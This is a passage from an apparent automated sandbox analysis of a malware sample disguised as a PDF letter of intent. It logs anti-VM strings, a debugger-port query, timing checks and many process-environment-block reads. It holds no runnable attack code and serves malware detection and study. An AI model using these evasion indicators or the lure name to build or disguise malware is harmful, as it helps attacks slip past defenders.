            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352648578.0000000002CCF000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2253237778.0000000002CCF000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2253398404.0000000002CCF000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002C78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ybjXXpYwhPHZD.exe, 00000007.00000002.3107806339.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeAPI call chain: ExitProcess graph end nodegraph_0-4366
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeAPI call chain: ExitProcess graph end nodegraph_0-4360
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D1C0 rdtsc 2_2_3300D1C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD35C0 NtCreateMutant,LdrInitializeThunk,2_2_32FD35C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F892FF mov eax, dword ptr fs:[00000030h]2_2_32F892FF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301930B mov eax, dword ptr fs:[00000030h]2_2_3301930B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301930B mov eax, dword ptr fs:[00000030h]2_2_3301930B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301930B mov eax, dword ptr fs:[00000030h]2_2_3301930B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305132D mov eax, dword ptr fs:[00000030h]2_2_3305132D
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305132D mov eax, dword ptr fs:[00000030h]2_2_3305132D
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B2D3 mov eax, dword ptr fs:[00000030h]2_2_32F8B2D3
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B2D3 mov eax, dword ptr fs:[00000030h]2_2_32F8B2D3
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B2D3 mov eax, dword ptr fs:[00000030h]2_2_32F8B2D3
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF2D0 mov eax, dword ptr fs:[00000030h]2_2_32FBF2D0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF2D0 mov eax, dword ptr fs:[00000030h]2_2_32FBF2D0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB2C0 mov eax, dword ptr fs:[00000030h]2_2_32FBB2C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB2C0 mov eax, dword ptr fs:[00000030h]2_2_32FBB2C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB2C0 mov eax, dword ptr fs:[00000030h]2_2_32FBB2C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB2C0 mov eax, dword ptr fs:[00000030h]2_2_32FBB2C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB2C0 mov eax, dword ptr fs:[00000030h]2_2_32FBB2C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB2C0 mov eax, dword ptr fs:[00000030h]2_2_32FBB2C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB2C0 mov eax, dword ptr fs:[00000030h]2_2_32FBB2C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F992C5 mov eax, dword ptr fs:[00000030h]2_2_32F992C5
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F992C5 mov eax, dword ptr fs:[00000030h]2_2_32F992C5
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33065341 mov eax, dword ptr fs:[00000030h]2_2_33065341
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA52A0 mov eax, dword ptr fs:[00000030h]2_2_32FA52A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA52A0 mov eax, dword ptr fs:[00000030h]2_2_32FA52A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA52A0 mov eax, dword ptr fs:[00000030h]2_2_32FA52A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA52A0 mov eax, dword ptr fs:[00000030h]2_2_32FA52A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC329E mov eax, dword ptr fs:[00000030h]2_2_32FC329E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC329E mov eax, dword ptr fs:[00000030h]2_2_32FC329E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F367 mov eax, dword ptr fs:[00000030h]2_2_3304F367
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33033370 mov eax, dword ptr fs:[00000030h]2_2_33033370
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD1270 mov eax, dword ptr fs:[00000030h]2_2_32FD1270
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD1270 mov eax, dword ptr fs:[00000030h]2_2_32FD1270
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB9274 mov eax, dword ptr fs:[00000030h]2_2_32FB9274
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306539D mov eax, dword ptr fs:[00000030h]2_2_3306539D
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC724D mov eax, dword ptr fs:[00000030h]2_2_32FC724D
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89240 mov eax, dword ptr fs:[00000030h]2_2_32F89240
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89240 mov eax, dword ptr fs:[00000030h]2_2_32F89240
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330313B9 mov eax, dword ptr fs:[00000030h]2_2_330313B9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330313B9 mov eax, dword ptr fs:[00000030h]2_2_330313B9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330313B9 mov eax, dword ptr fs:[00000030h]2_2_330313B9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304B3D0 mov ecx, dword ptr fs:[00000030h]2_2_3304B3D0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F3E6 mov eax, dword ptr fs:[00000030h]2_2_3304F3E6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC7208 mov eax, dword ptr fs:[00000030h]2_2_32FC7208
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC7208 mov eax, dword ptr fs:[00000030h]2_2_32FC7208
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330653FC mov eax, dword ptr fs:[00000030h]2_2_330653FC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33065227 mov eax, dword ptr fs:[00000030h]2_2_33065227
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304B256 mov eax, dword ptr fs:[00000030h]2_2_3304B256
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304B256 mov eax, dword ptr fs:[00000030h]2_2_3304B256
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC33A0 mov eax, dword ptr fs:[00000030h]2_2_32FC33A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC33A0 mov eax, dword ptr fs:[00000030h]2_2_32FC33A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB33A5 mov eax, dword ptr fs:[00000030h]2_2_32FB33A5
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FE739A mov eax, dword ptr fs:[00000030h]2_2_32FE739A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FE739A mov eax, dword ptr fs:[00000030h]2_2_32FE739A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305D26B mov eax, dword ptr fs:[00000030h]2_2_3305D26B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305D26B mov eax, dword ptr fs:[00000030h]2_2_3305D26B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33065283 mov eax, dword ptr fs:[00000030h]2_2_33065283
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F97370 mov eax, dword ptr fs:[00000030h]2_2_32F97370
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F97370 mov eax, dword ptr fs:[00000030h]2_2_32F97370
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F97370 mov eax, dword ptr fs:[00000030h]2_2_32F97370
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330272A0 mov eax, dword ptr fs:[00000030h]2_2_330272A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330272A0 mov eax, dword ptr fs:[00000030h]2_2_330272A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330592A6 mov eax, dword ptr fs:[00000030h]2_2_330592A6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330592A6 mov eax, dword ptr fs:[00000030h]2_2_330592A6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330592A6 mov eax, dword ptr fs:[00000030h]2_2_330592A6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330592A6 mov eax, dword ptr fs:[00000030h]2_2_330592A6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89353 mov eax, dword ptr fs:[00000030h]2_2_32F89353
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89353 mov eax, dword ptr fs:[00000030h]2_2_32F89353
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8D34C mov eax, dword ptr fs:[00000030h]2_2_32F8D34C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8D34C mov eax, dword ptr fs:[00000030h]2_2_32F8D34C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330192BC mov eax, dword ptr fs:[00000030h]2_2_330192BC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330192BC mov eax, dword ptr fs:[00000030h]2_2_330192BC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330192BC mov ecx, dword ptr fs:[00000030h]2_2_330192BC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330192BC mov ecx, dword ptr fs:[00000030h]2_2_330192BC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F87330 mov eax, dword ptr fs:[00000030h]2_2_32F87330
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF32A mov eax, dword ptr fs:[00000030h]2_2_32FBF32A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330652E2 mov eax, dword ptr fs:[00000030h]2_2_330652E2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED mov eax, dword ptr fs:[00000030h]2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303B2F0 mov eax, dword ptr fs:[00000030h]2_2_3303B2F0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303B2F0 mov eax, dword ptr fs:[00000030h]2_2_3303B2F0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F2F8 mov eax, dword ptr fs:[00000030h]2_2_3304F2F8
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB50E4 mov eax, dword ptr fs:[00000030h]2_2_32FB50E4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB50E4 mov ecx, dword ptr fs:[00000030h]2_2_32FB50E4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB90DB mov eax, dword ptr fs:[00000030h]2_2_32FB90DB
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov ecx, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov ecx, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov ecx, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov ecx, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C0 mov eax, dword ptr fs:[00000030h]2_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33023140 mov eax, dword ptr fs:[00000030h]2_2_33023140
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33023140 mov eax, dword ptr fs:[00000030h]2_2_33023140
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33023140 mov eax, dword ptr fs:[00000030h]2_2_33023140
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33065152 mov eax, dword ptr fs:[00000030h]2_2_33065152
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC909C mov eax, dword ptr fs:[00000030h]2_2_32FC909C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBD090 mov eax, dword ptr fs:[00000030h]2_2_32FBD090
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBD090 mov eax, dword ptr fs:[00000030h]2_2_32FBD090
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F95096 mov eax, dword ptr fs:[00000030h]2_2_32F95096
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8D08D mov eax, dword ptr fs:[00000030h]2_2_32F8D08D
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33029179 mov eax, dword ptr fs:[00000030h]2_2_33029179
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33045180 mov eax, dword ptr fs:[00000030h]2_2_33045180
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33045180 mov eax, dword ptr fs:[00000030h]2_2_33045180
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov ecx, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1070 mov eax, dword ptr fs:[00000030h]2_2_32FA1070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330411A4 mov eax, dword ptr fs:[00000030h]2_2_330411A4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330411A4 mov eax, dword ptr fs:[00000030h]2_2_330411A4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330411A4 mov eax, dword ptr fs:[00000030h]2_2_330411A4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330411A4 mov eax, dword ptr fs:[00000030h]2_2_330411A4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB052 mov eax, dword ptr fs:[00000030h]2_2_32FBB052
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330651CB mov eax, dword ptr fs:[00000030h]2_2_330651CB
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330371F9 mov esi, dword ptr fs:[00000030h]2_2_330371F9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
